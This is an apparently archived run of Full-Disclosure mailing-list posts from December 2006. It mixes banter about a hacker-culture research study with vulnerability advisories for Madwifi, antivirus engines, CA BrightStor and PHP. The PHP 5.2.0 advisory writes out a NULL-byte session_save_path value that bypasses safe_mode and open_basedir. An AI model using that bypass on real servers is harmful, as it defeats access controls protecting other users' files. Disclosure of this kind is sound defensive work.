conducting a study of hackers > and hacking and am seeking interested men and women who may be willing to > participate." - "participate"?? *raises eyebrows* men hacking women? *raises-hand* me me! "The purpose of this research is to understand the ways that > people become interested in computers and hacking" - actually there is no "way". if you grow up around computers, you start to like them and experiment with them more (applies to women as well. *epiphany* so THAT's why I could never get to experiment with them in high school!!!!). If you grow up in a family full of doctors, chances are, you'll become a doctor and be quite good at it as well ("chances are", not "YOU WILL") So I think you have the answer already. Just think on how YOU became an Assistant Professor, and how you now have a PhD and apply it to the other people with a different interest. "I have obtained a Certificate of > Confidentiality from the National Institutes of Health to further protect > and ensure your privacy and confidentiality." - of Health?? to ensure privacy?? something's not right. in fact, something smells fishy!!!! (btw, fish sauce is very good with beef boiled for a loooong time with onions. and some salt. and whatever suits your fancy) "than simple media > conceptions of the hacker as a criminal." - nope that's not true now. at least it was a few years ago, but then again that is just my opinion, and I believe the media has grown to respect the "hackers" and have made a distinction between the "hackers" and the Russian-mafia-chinese-mafia-whatever-mafia-releasing-0-days-and-attacking-organizations-or-those-sites-with-drive-by-downloadings-and-shit. " hear crazy stories about how you hacked NASA. > If you have," - no, but I have read some crazy-ass stories by a Tom Holt (a lot like Harry Potter, although I prefer Harry Potter, err, i mean I prefer the story of Harry Potter, especially all the parts with Hermione. grrrrrrrroowllll) growling, "swing and stretch. secrets to making great noodles" On 12/8/06, Thomas Holt wrote: > > > > Greetings, > My name is Tom Holt, and I am an Assistant Professor at the University of > North Carolina at Charlotte. I am currently conducting a study of hackers > and hacking and am seeking interested men and women who may be willing to > participate. The purpose of this research is to understand the ways that > people become interested in computers and hacking, their motives for > hacking, and how they apply their skills in different settings. This study > will also consider individuals' conceptions of hacking and experiences in > hacker culture. > > To understand this phenomenon, I am seeking individuals who are willing to > share their experiences and opinions in an interview which can be conducted > either in person or via encrypted e-mail. Strict confidentiality will be > maintained and your privacy ensured. I have obtained a Certificate of > Confidentiality from the National Institutes of Health to further protect > and ensure your privacy and confidentiality. All individuals who complete an > interview will be paid $10 for their time, and $10 will also be paid for > successful referrals. > > If you know anyone who is, or considers his/herself to be a hacker and is > willing to be interviewed, please contact me via email at tjholt at uncc.edu, > at researchonhackers at yahoo.com, or by phone at 704-795-9544. Again, strict > confidentiality will be maintained and your privacy ensured. > > I am not a law enforcement agent nor connected with any law enforcement > agency and am not looking to hear crazy stories about how you hacked NASA. > If you have, great, but I realize there is more to hacking than simple media > conceptions of the hacker as a criminal. Instead, I am interested in > understanding hacking from the hackers' point of view. I have presented my > research and described this project at several cons, including CarolinaCon > 06, PhreakNIC X, and Defcons 13/14 and am hoping to hear from more > individuals in the community. > > > Please contact me if you are interested, and I look forward to hearing from > you. > > Thank you, > > Thomas J. Holt, Ph. D. > > > > ________________________________ > Have a burning question? Go to Yahoo! Answers and get answers from real > people who know. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From tyoptyop at gmail.com Fri Dec 8 19:08:48 2006 From: tyoptyop at gmail.com (Tyop?) Date: Fri, 8 Dec 2006 20:08:48 +0100 Subject: [Full-disclosure] [Madwifi] Madwifi SIOCGIWSCAN buffer overflow // France Telecom Message-ID: <985b1a3d0612081108k1b5631e9g49f639e2f9284d09@mail.gmail.com> Name: Madwifi SIOCGIWSCAN buffer overflow Vendor: http://www.madwifi.org Release date: December, 7th 2006 CVE ID: CVE-2006-6332 Authors: Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES 1. Description There is a buffer overflow in the madwifi Atheros driver in some functions called by SIOCSIWSCAN ioctl. This issue is remotely exploitable because ioctl SIOCSIWSCAN may be called automatically by some connexion managers (either directly, by using iwlib or by calling iwlist) when trying to get a list of nearby access points. 2. Details There is a stack buffer overflow in both the giwscan_cb() and encode_ie() functions (ieee80211_wireless.c). The first issue, in giwscan_cb, is related with insufficient checks on the length in some 802.11 information elements which are controlled by the attacker: memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2); The second issue is improper boundary checks in encode_ie() where ielen is never checked with bufsize. for (i = 0; i < ielen && bufsize > 2; i++) p += sprintf(p, "%02x", ie[i]); A properly crafted 802.11 beacon or probe response frame will trigger the bug when a process tries to get scanning results by calling ioctl SIOCGIWSCAN. The information element used by the attacker can be either WPA IE, RSN IE, WMM IE or ATH IE and will lead to a kernel stack overflow. 3. Vendor status The vendor was notified on December, 6th 2006 and issued version 0.9.2.1 to correct the issue. 4. Authors Laurent BUTTI Jerome RAZNIEWSKI Julien TINNES -- Tyop? From michael.holstein at csuohio.edu Fri Dec 8 19:57:40 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 08 Dec 2006 14:57:40 -0500 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: <4579C3B4.6040609@csuohio.edu> Wouldn't the best way to do this to be find a way to get friendly with the State's board of Probation & Parole? .. survey the folks that got caught so they can tell you about it. Folks that haven't gotten caught are obviously not all that bright if they chat it up about their misdeeds. That said .. I've had some interesting discussions with the botnet kiddies by reverse-engineering their malware and lurking in the appropriate IRC channel (just do it from a separate dialup connection, lest you get DDOS'ed). Usually the "why" question is answered with a variation of "because I could.." or "boredom" or both. Cheers, Michael Holstein CISSP GCIA Cleveland State University PS: I hate to be the one to point this out, but nothing will protect your "confidential" research from a subpoena. From nicolas.ruff at gmail.com Fri Dec 8 18:24:03 2006 From: nicolas.ruff at gmail.com (Nicolas RUFF) Date: Fri, 08 Dec 2006 19:24:03 +0100 Subject: [Full-disclosure] What was the name of the web site ... In-Reply-To: <45796948.8070604@telekom.yu> References: <45796948.8070604@telekom.yu> Message-ID: <4579ADC3.5010607@gmail.com> > ... that keeps track of MS vulnerabilities, patches and the > corresponding exploits? > > I know that it was mentioned earlier in this list but can not remember > the URL right now... elsenot.com ? Seems to be inactive til March :( -nicolas- From noodle.mastah at gmail.com Fri Dec 8 17:46:58 2006 From: noodle.mastah at gmail.com (chinese soup) Date: Fri, 8 Dec 2006 18:46:58 +0100 Subject: [Full-disclosure] Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) In-Reply-To: References: <45766AB6.2080807@gmail.com> Message-ID: (waiting for the deluge of other lemmings who go: "it works on blahblah with SPblahblah" "confirmed on blahblah with blahblah language" "blablah did not work for me blahblah" can't you just find out the cause and not test EVERY version of IE that you have? I mean, yeah, ok, so you tested it on IE7 yeah big deal. he reports it on IE6. you know why it is "putting iexplore.exe at 100% CPU"? It's like when a truck crashes into a car and everyone goes out and tests the truck against their own cars: "Hey, the truck also totally destroyed my Ford Explorer!" "Oh, it also totalled my Toyota!". "Nope, it had no effect on my tank" yeah i mean i COULD test it, but i'm too busy with... ehrm... cooking. yes cooking. cooking, "i like my noodles boiled, not fried. well, sometimes fried" On 12/7/06, Andrius Paurys wrote: > On 12/6/06, Jos? Carlos Nieto Jarqu?n wrote: > > Note: > > I'm sorry, two of the the exploits in the prior e-mail were incomplete. > > > > This is just another couple of proof of concept exploits for this > > well-known browser. The third one is a lame combination of both. > > > > Tested under Windows XP SP2, MSIE 6.0.2900.2180 > > > Also confirmed working on Windows Server 2003 R2 (Build 3790) with > Internet Explorer 7.0.5730.11 > > 1st exploit was working fine putting iexplore.exe at 100% CPU. It > complained about "IE restricting this web page from running scripts" > (probably because of enabled Internet Explorer Enhanced Security > Configuration), but if you click "allow this website to run this" > (which is enabled by default if above mentioned IE ESC is not present) > it works. > > 2nd and 3rd were not exactly working, (also because of IE ESC) because > after clicking allow after several windows it was asking again, but > should work on WinXP and IE7. > > > > -- > Andrius Paurys > $h at MAN > > andrius.paurys at gmail.com > Tel.: +37067449273 > ICQ: 279424019 > MSN: andrius.paurys at gmail.com > http://shaman.tinkle.lt/ > > I'm Lithuanian, what's _your_ excuse? > S?di programeris nevalg?s ir nieko... > From labs-no-reply at idefense.com Fri Dec 8 22:56:23 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 08 Dec 2006 17:56:23 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.08.06: Multiple Vendor Antivirus RAR File Denial of Service Vulnerability Message-ID: <4579ED97.2060809@idefense.com> Multiple Vendor Antivirus RAR File Denial of Service Vulnerability iDefense Security Advisory 12.08.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 08, 2006 I. BACKGROUND AntiVirus products typically handle searching files for known viruses within their scan engines. Most scan engines support searching inside of known archive types for viruses as well. For more information refer to any of the popular AntiVirus vendors' web sites. II. DESCRIPTION Remote exploitation of a denial of service vulnerability in Multiple Vendors' Antivirus engines allows an attacker to cause the engines to consume excessive resources. The affected vendors' scan engines are vulnerable to a DoS attack when scanning specially malformed RAR archives. Specifically, the malformed archives will have the head_size and pack_size fields set to zero in Archive Header section. When such a file is encountered, the affected scan engines will enter an infinite loop. III. ANALYSIS Successful exploitation will allow an attacker to cause the affected scan engine to consume excessive CPU, and in some cases memory, resources. The malicious RAR file would need to be uploaded to a server to initiate the attack. Several common ways this could be achived are e-mail attachments, available network shares, FTP accounts, or Web form uploads. The impact of the vulnerability varies slightly from vendor to vendor as described below. Sophos: Scanning of archives is not enabled by default and must be specified by the user. This denial of service attack will prevent the scanner from scanning other files on disk while it is stuck on the exploit file. The hung process can be stopped by the user. Trend Micro: Once attacked, the scan engine will consume 99 percent of CPU resources and the affected computer will require a reboot to recover from the condition. The scan engine process cannot be forced to quit, although its thread priority can be lowered to regain some use of the system before reboot. IV. DETECTION iDefense has confirmed this vulnerability exists in the following vendors' products. This should not be considered an exhaustive list as these vendors tend to include the scan engine in many of their products. Previous versions are likely to be affected as well. * Sophos Small business edition (Windows/Linux) 4.06.1 with engine version 2.34.3. * Trend Micro PC Cillin - Internet Security 2006 * Trend Micro Office Scan 7.3 * Trend Micro Server Protect 5.58 V. WORKAROUND For Sophos' scan engine, this exploit will not have any effect if the "Enabled scanning of archives" option is not set. iDefense is currently unaware of a workaround for this issue for the remaining vendor's engines. VI. VENDOR RESPONSE Sophos has addressed this problem with new versions of their products. See http://www.sophos.com/support/knowledgebase/article/7609.html for more information. Trend Micro stated that this vulnerability does not affect version 8.320 of their Windows scan engine. Additionally, they have released version 8.150 of the HPUX and AIX builds of their scan engine to address this problem in those environments. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-5645 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/27/2006 Initial vendor notifications 09/27/2006 Initial vendor response - Trend Micro 09/28/2006 Initial vendor response - Sophos 12/08/2006 Coordinated public disclosure IX. CREDIT The vulnerability was reported by Titon of BastardLabs, Damian Put , and an anonymous researcher. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Fri Dec 8 22:56:31 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 08 Dec 2006 17:56:31 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.08.06: Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability Message-ID: <4579ED9F.4060902@idefense.com> Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability iDefense Security Advisory 12.08.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 08, 2006 I. BACKGROUND Sophos AntiVirus offers protection from the latest Trojans, worms and Viruses. More information is available on the vendors site at: http://sophos.com/products/ II. DESCRIPTION Sophos AntiVirus Engine is vulnerable to a Memory Corruption vulnerability when scanning malformed CHM archives. This memory corruption vulnerability can be triggered when Sophos Antivirus engine scans a malformed CHM file which has a large name length specified in a CHM chunk header. III. ANALYSIS Malformed CHM files can lead to a Memory Corruption condition on the local machine. This memory corruption vulnerability could potentially result in arbitrary code execution. Files received as email attachments, uploaded via web forms or otherwise saved to disk may trigger this condition if auto scanning is enabled on the target machine. Archive scanning is disabled by default and must be specified in order for this vulnerability to trigger. IV. DETECTION iDefense has confirmed this vulnerability in the following Sophos Antivirus products: * Sophos Small business edition (Linux) Product version: 4.06.1 Engine version : 2.34.3 Previous versions of Sophos Antivirus are suspected vulnerable. Other Sophos Antivirus products may also be vulnerable. Windows versions of the Sophos Antivirus product do not appear to be vulnerable. V. WORKAROUND Disabling the option to scan within archives will prevent exploitation of this vulnerability. VI. VENDOR RESPONSE Sophos has addressed this problem with new versions of their products. See http://www.sophos.com/support/knowledgebase/article/7609.html for more information. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-5647 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/28/2006 Initial vendor notification 10/02/2006 Initial vendor response 12/08/2006 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Damian Put . Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Fri Dec 8 22:56:37 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 08 Dec 2006 17:56:37 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.08.06: Sophos Antivirus CHM File Heap Overflow Vulnerability Message-ID: <4579EDA5.9090104@idefense.com> Sophos Antivirus CHM File Heap Overflow Vulnerability iDefense Security Advisory 12.08.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 08, 2006 I. BACKGROUND Sophos AntiVirus offers protection from the latest Trojans, worms and Viruses. More information is available on the vendors site at: http://sophos.com/products/ II. DESCRIPTION Sophos AntiVirus Engine is vulnerable to a Heap Overflow attack when scanning malformed CHM archives. Specifically, if the CHM file has a Window_size of 0 set in a LZX decompression header then memory corruption will occur. III. ANALYSIS Malformed CHM files can lead to a heap overflow condition on the local machine. Files received as email attachments, uploaded via web forms or otherwise saved to disk may trigger this condition if auto scanning is enabled on the target machine. Archive scanning is disabled by default and must be specified in order for this vulnerability to trigger. IV. DETECTION iDefense has confirmed this vulnerability in the following Sophos Antivirus products: * Sophos Antivirus for Linux Product version: 4.03 Engine version : 4.05 Previous versions of Sophos Antivirus are suspected vulnerable. Other Sophos Antivirus products may also be vulnerable. Windows versions of the Sophos Antivirus product do not appear to be vulnerable. V. WORKAROUND Disabling the option to scan within archives will prevent exploitation of this vulnerability. VI. VENDOR RESPONSE Sophos has addressed this problem with new versions of their products. See http://www.sophos.com/support/knowledgebase/article/7609.html for more information. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-5646 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/28/2006 Initial vendor notification 10/02/2006 Initial vendor response 12/08/2006 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Damian Put . Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From exceed at email.si Fri Dec 8 22:44:38 2006 From: exceed at email.si (/dev/null) Date: Fri, 08 Dec 2006 23:44:38 +0100 Subject: [Full-disclosure] What was the name of the web site ... In-Reply-To: <45796948.8070604@telekom.yu> References: <45796948.8070604@telekom.yu> Message-ID: <20061208224439.BF9CA8B929@www1.email.si> http://elsenot.com/ http://jav.ch/ both inactive, btw... ./E On Fri, 8 Dec 2006 at 13:29:00, solenoid (lists) wrote: > ... that keeps track of MS vulnerabilities, patches and the > corresponding exploits? > > I know that it was mentioned earlier in this list but can not remember > the URL right now... > > TIA > ____________________ http://www.email.si/ From bill.louis at gmail.com Sat Dec 9 00:16:00 2006 From: bill.louis at gmail.com (Bill Louis) Date: Sat, 9 Dec 2006 08:16:00 +0800 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... In-Reply-To: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> References: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> Message-ID: <21ae1b060612081616n7f1d23c3u2328948b196e3290@mail.gmail.com> This domain name means something for someone, and it is hard for a person to level up google pagerank to 4. I've do a lot on it. 2006/12/8, Louis Wang : > hi, there: > I don't konw whether it is the right place to post this message, > but the web site is security related in my original thought. > I'd like to sell my web site http://www.lwang.org. It has google > pageranked 4, and full control of domain. The web server is in Czech, > it has 500M space and 5G traffic per month. > Anyone interested in it, please contact me. > Thanks. > -- Regards, Bill Louis. From lwang at lwang.org Sat Dec 9 00:02:43 2006 From: lwang at lwang.org (Louis Wang) Date: Sat, 9 Dec 2006 08:02:43 +0800 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... In-Reply-To: References: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> Message-ID: <21ae1b060612081602n5b3e368ha0f47ce6f8662908@mail.gmail.com> 2006/12/9, Dude VanWinkle : > On 12/8/06, Louis Wang wrote: > > I'd like to sell my web site http://www.lwang.org. It has google > > pageranked 4, and full control of domain. The web server is in Czech, > > it has 500M space and 5G traffic per month. > > is it pageranked #4 for the word "wang"? You even don't know google pagerank, so i don't talk to u. SB! > > what is the czech work for Willie the One Eyed Wonder Weasel?? > > anyways, if you are going to try and sell a site based on its rank, > and assuming you arent talking about smell, you might want to include > the category. Even though you said its a security related site; the > content isnt always a guarantee of the category it is associated with, > see: disney pr0n googlebombing, etc, etc. > > We could look it up, but not only are FD'ers notoriously lazy, as you > are the "salesman" you might want to try and attract lazy marks,.. err > buyers. > > -JP > > Bonus wang link with a hat-tip to Larry Seltzer for providing it, > maybe NSFW depending on where you W: > http://www.starma.com/penis/penis.html > -- Regards, Bill Louis. From bressers at redhat.com Sat Dec 9 01:21:37 2006 From: bressers at redhat.com (Josh Bressers) Date: Fri, 08 Dec 2006 20:21:37 -0500 Subject: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation In-Reply-To: References: Message-ID: <20061209012137.889CB6544A@evolution.bress.net> > eEye Research - http://research.eeye.com > > Intel Network Adapter Driver Local Privilege Escalation > > Release Date: > December 7, 2006 > > Date Reported: > July 10, 2006 > > Severity: > Medium (Local Privilege Escalation to Kernel) > > Systems Affected: > Windows 2000, XP, 2003, Vista > Intel PRO 10/100 - 8.0.27.0 or previous > Intel PRO/1000 - 8.7.1.0 or previous > Intel PRO/1000 PCI - 9.1.30.0 or previous > Linux > Intel PRO 10/100 - 3.5.14 or previous > Intel PRO/1000 - 7.2.7 or previous > Intel PRO/10GbE - 1.0.109 or previous > UnixWare/SCO6 > Intel PRO 10/100 - 4.0.3 or previous > Intel PRO/1000 - 9.0.15 or previous It's worth noting that this advisory is misleading. This flaw does not affect the Linux drivers. The Linux drivers do not support the NDIS API and the OID concept that Windows does. -- Josh Bressers // Red Hat Security Response Team From max at jestsuper.pl Fri Dec 8 21:23:35 2006 From: max at jestsuper.pl (Maksymilian Arciemowicz) Date: Fri, 8 Dec 2006 22:23:35 +0100 Subject: [Full-disclosure] PHP 5.2.0 session.save_path safe_mode and open_basedir bypass Message-ID: <200612082223.35648.max@jestsuper.pl> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [PHP 5.2.0 session.save_path safe_mode and open_basedir bypass] Author: Maksymilian Arciemowicz (SecurityReason) Date: - - Written: 02.10.2006 - - Public: 08.12.2006 SecurityAlert Id: 43 CVE: CVE-2006-6383 SecurityRisk: High Affected Software: PHP 5.2.0 Advisory URL: http://securityreason.com/achievement_securityalert/43 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. Session support in PHP consists of a way to preserve certain data across subsequent accesses. This enables you to build more customized applications and increase the appeal of your web site. A visitor accessing your web site is assigned a unique id, the so-called session id. This is either stored in a cookie on the user side or is propagated in the URL. session.save_path defines the argument which is passed to the save handler. If you choose the default files handler, this is the path where the files are created. Defaults to /tmp. See also session_save_path(). There is an optional N argument to this directive that determines the number of directory levels your session files will be spread around in. For example, setting to '5;/tmp' may end up creating a session file and location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you must create all of these directories before use. A small shell script exists in ext/session to do this, it's called mod_files.sh. Also note that if N is used and greater than 0 then automatic garbage collection will not be performed, see a copy of php.ini for further information. Also, if you use N, be sure to surround session.save_path in "quotes" because the separator (;) is also used for comments in php.ini. - --- 1. session.save_path safe mode and open basedir bypass --- session.save_path can be set in ini_set(), session_save_path() function. In session.save_path there must be path where you will save yours tmp file. But syntax for session.save_path can be: [/PATH] OR [N;/PATH] N - can be a string. EXAMPLES: 1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS") 2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS") and 3. session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS") - -1477-1493--- Code from PHP520 ext/session/session.c [START] PHP_FUNCTION(session_save_path) { zval **p_name; int ac = ZEND_NUM_ARGS(); char *old; if (ac < 0 || ac > 1 || zend_get_parameters_ex(ac, &p_name) == FAILURE) WRONG_PARAM_COUNT; old = estrdup(PS(save_path)); if (ac == 1) { convert_to_string_ex(p_name); zend_alter_ini_entry("session.save_path", sizeof("session.save_path"), Z_STRVAL_PP(p_name), Z_STRLEN_PP(p_name), PHP_INI_USER, PHP_INI_STAGE_RUNTIME); } RETVAL_STRING(old, 0); } - -1477-1493--- Code from PHP520 ext/session/session.c [END] Values are set to hash_memory (but before that, safe_mode and open_basedir check this value). And if you are starting session (for example session_start()), that value from session.save_path is checked by function PS_OPEN_FUNC(files). - -242-300--- Code from PHP520 ext/session/mod_files.c [START] PS_OPEN_FUNC(files) { ps_files *data; const char *p, *last; const char *argv[3]; int argc = 0; size_t dirdepth = 0; int filemode = 0600; if (*save_path == '\0') { /* if save path is an empty string, determine the temporary dir */ save_path = php_get_temporary_directory(); } /* split up input parameter */ last = save_path; p = strchr(save_path, ';'); while (p) { argv[argc++] = last; last = ++p; p = strchr(p, ';'); if (argc > 1) break; } argv[argc++] = last; if (argc > 1) { errno = 0; dirdepth = (size_t) strtol(argv[0], NULL, 10); if (errno == ERANGE) { php_error(E_WARNING, "The first parameter in session.save_path is invalid"); return FAILURE; } } if (argc > 2) { errno = 0; filemode = strtol(argv[1], NULL, 8); if (errno == ERANGE || filemode < 0 || filemode > 07777) { php_error(E_WARNING, "The second parameter in session.save_path is invalid"); return FAILURE; } } save_path = argv[argc - 1]; data = emalloc(sizeof(*data)); memset(data, 0, sizeof(*data)); data->fd = -1; data->dirdepth = dirdepth; data->filemode = filemode; data->basedir_len = strlen(save_path); data->basedir = estrndup(save_path, data->basedir_len); PS_SET_MOD_DATA(data); return SUCCESS; } - -242-300--- Code from PHP520 ext/session/mod_files.c [END] Because in session.save_path there is a NULL byte before ";", strchr() doesn't see ";" and path is /DIR/WHERE/YOU/DONT/HAVE/ACCESS. Problem exists because safe_mode and open_basedir check what is after ;. And it is needed to set correct path after ";". - --- 2. How to fix --- http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and l5x, p_e_a, lorddav, pi3 - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg Regards SecurityReason -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFFedKL3Ke13X/fTO4RAms1AKCTSc8CNZmHWhXvOdjtTBcIgdHTuwCgkvrz 9KnewH0rOVFfmPRx2f1x5W4= =YAP9 -----END PGP SIGNATURE----- From advisories at lssec.com Fri Dec 8 21:39:31 2006 From: advisories at lssec.com (advisories at lssec.com) Date: Fri, 8 Dec 2006 22:39:31 +0100 (CET) Subject: [Full-disclosure] LS-20060908 - Computer Associates BrightStor ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability Message-ID: <20061208213931.F332420C21@dd4012.kasserver.com> LS-20060908 LSsec has discovered a vulnerability in Computer Associates BrightStor ARCserve Backup v11.5, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The flaw specifically exists within the Tape Engine (tapeeng.exe) due to incorrect handling of RPC requests on TCP port 6502. The interface is identified by 62b93df0-8b02-11ce-876c-00805f842837. Opnum 37 specifies the vulnerable operation within this interface. Technical details: http://www.lssec.com/advisories.html LSsecurity - LSsec.com From advisories at lssec.com Fri Dec 8 21:40:47 2006 From: advisories at lssec.com (advisories at lssec.com) Date: Fri, 8 Dec 2006 22:40:47 +0100 (CET) Subject: [Full-disclosure] LS-20061001 - Computer Associates BrightStor ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability Message-ID: <20061208214047.8CD0D20C0C@dd4012.kasserver.com> LS-20061001 LSsec has discovered a vulnerability in Computer Associates BrightStor ARCserve Backup v11.5, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The flaw specifically exists within the Tape Engine (tapeeng.exe) due to incorrect handling of RPC requests on TCP port 6502. The interface is identified by 62b93df0-8b02-11ce-876c-00805f842837. Opnum 38 specifies the vulnerable operation within this interface. Technical details: http://www.lssec.com/advisories.html LSsecurity - LSsec.com From ge at linuxbox.org Sat Dec 9 03:22:40 2006 From: ge at linuxbox.org (Gadi Evron) Date: Fri, 8 Dec 2006 21:22:40 -0600 (CST) Subject: [Full-disclosure] Agenda and Schedule for January ISOI 2 Workshop Message-ID: The agenda and schedule for the workshop can be found here: http://isotf.org/isoi2.html Gadi. From ejes at torfree.net Fri Dec 8 20:47:09 2006 From: ejes at torfree.net (Evan Stawnyczy) Date: Fri, 8 Dec 2006 15:47:09 -0500 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Message-ID: Greetings Tom, My name is Evan ($LastNameNotDisclosed$). I currently work at an Internet security company. I work alongside security professionals, hackers, crackers, and the like. They, like most professionals, are all very ethical, and intelligent people who I am proud to call my colleagues. Reading through the thread in response to your email has got me wondering: What do you mean by hacker? I have recently discovered that there are a few different meanings to this term, and therefore a few different 'cultures'. The one, most negative connotation of hacker, was introduced to me (by my girlfriend) a few weeks ago. Apparently (according to her), when most people hear the term "hacker" they think of some greasy 13-year old boy sitting alone in his room breaking other peoples computers "because they can" or "to be destructive" or "because they're spoiled rich kids"... the list goes on. Another, more sinister "hacker" I have heard of, is more of a "movie star hacker". Some person (usually a guy, but not always *remember "Mainframe from the classic cartoon COPS"*) who with sinister intent would break computer systems for profit. This does extend to the "good guy hacker" who is usually doing it for money or fame, or at least a reward of some type. These "hackers" are almost magical beings, with the ability to erase an entire network with little more than a keystroke. These "hackers" are (imho) fairy tales. That isn't to say there aren't some "hackers" with sinister intent, who "hack" banks for money, and "hack" the Pentagon for whatever conspiracy that's being covered up. I doubt that these hackers are any kind of majority. And these are the "hackers" commonly referred to as "crackers," and the ones you'd probably want to look for in jail, or working for some big security corporation (see http://news.bbc.co.uk/1/hi/sci/tech/1541252.stm mafiaboy) The "hacker" that I identify with is the definition commonly associated with the 'glider emblem' (see: http://catb.org/~esr/faqs/hacker-howto.html#what_is) and is what I call myself. My answer to "why?" Although I am very technically savvy, I would not say that I am by any means elite (l337 ;) ) or even as elite as some of my colleagues. I guess that would be one trait of the "hacker". They always are willing to learn more and mostly concerned with the fact that everyone can teach them something. In fact, any hacker that I have known, or met, has had just that; "an unquenchable thirst for knowledge". Knowledge of any kind, not just computers. You may, if your research points to the type of "hacker" that I am referring to, want to read this excellent site: http://catb.org/~esr/faqs/hacker-howto.html If you are interested, I would happily speak with you further. If not, good luck with your research. Thanks, -e` > Greetings, > My name is Tom Holt, and I am an Assistant Professor at the University of North Carolina > at Charlotte. I am currently conducting a study of hackers and hacking and am seeking > interested men and women who may be willing to participate. The purpose of this > research is to understand the ways that people become interested in computers and > hacking, their motives for hacking, and how they apply their skills in different settings. >This study will also consider individuals? conceptions of 